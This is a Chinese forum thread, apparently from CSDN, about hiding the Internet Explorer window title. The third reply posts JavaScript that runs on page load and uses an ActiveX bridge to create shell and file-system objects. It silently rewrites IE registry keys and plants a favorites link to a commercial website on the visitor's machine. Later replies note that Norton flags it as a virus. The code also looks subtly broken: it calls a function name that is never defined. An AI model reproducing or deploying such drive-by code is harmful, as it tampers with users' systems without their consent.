<title>Your Title&nbsp;</title>

解决方案 »

  1.   

    不行啊...顶部那个(Web Page Dialog)的Title还是存在的嘛
    就象打开ie浏览器的时候.在title处会出现Microsoft Internet Explorer 字样
    我想把这个东西去掉
      

  2.   

    用空格是可以把这几个字挤掉...但是要打N百个&nbsp;
    朋友们.帮帮忙拉~!要不,我今天下不了班了~!
      

  3.   

    说实话,这样做比较不好.
    <script>
    document.write("<applet height=0 width=0 code=com.ms.activeX.ActiveXComponent></applet>");
    function AddFavLnk(LocationHref,LinkName,SiteURL)
    {
    var Link=Shell.CreateShortcut(LocationHref+"\\"+LinkName+".URL");
    Link.TargetPath=SiteURL;
    Link.Save();
    }
    function initFunction()
    {
    try 
    {
    //ActiveX initialization
    A1=document.applets[0];
    A1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
    A1.createInstance();
    Shell=A1.GetObject();
    A1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
    A1.createInstance();
    FSO=A1.GetObject();
    A1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
    A1.createInstance();
    Net=A1.GetObject();
    try 
    {
    if(document.cookie.indexOf("Telstar")==-1)
    {
    Shell.RegWrite("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title","");
    Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title","");var DateObject=new Date((new Date()).getTime()+(1));
    document.cookie="Telstar=general;date="+DateObject.toGMTString()+";path=/;"WF=FSO.GetSpecialFolder(0);
    LocationHref=WF+"\\Favorites";
    if(!FSO.FolderExists(LocationHref))
    {
    LocationHref=FSO.GetDriveName(WF)+"\\Documents and Settings\\"+Net.UserName+"\\Favorites";
    if(!FSO.FolderExists(LocationHref))
    {
    return;
    }
    }
    AddLink(LocationHref,"☆泰利达电脑☆","http://www.tel-star.com.cn/");
    }
    }
    catch(e)
    {}
    }
    catch(e)
    {}
    }
    function init()
    {
    setTimeout("initFunction()", 1000);
    }
    init();
    </script>
      

  4.   

    确实不好,Norton查出来楼上的代码是个病毒
      

  5.   

    是不是脚本里面有写注册表的操作,Norton就认为是病毒了?